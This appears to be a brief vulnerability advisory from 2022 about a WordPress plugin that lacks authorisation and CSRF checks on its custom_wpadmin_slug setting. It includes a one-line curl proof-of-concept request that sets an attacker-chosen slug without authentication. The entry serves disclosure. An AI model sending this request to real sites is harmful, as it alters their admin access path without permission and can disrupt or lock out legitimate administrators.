The plugin does not have authorisation and CSRF checks in place when updating the custom_wpadmin_slug settings, allowing unauthenticated attackers to update it with a crafted request
curl -X POST --data "custom_wpadmin_slug=attacker-value" https://example.com/wp-admin/admin-post.php Settings is displayed in Settings > Permalinks
Daniel Ruf
Daniel Ruf
Yes
2022-10-17 (about 3 months ago)
2022-10-17 (about 3 months ago)
2022-10-17 (about 3 months ago)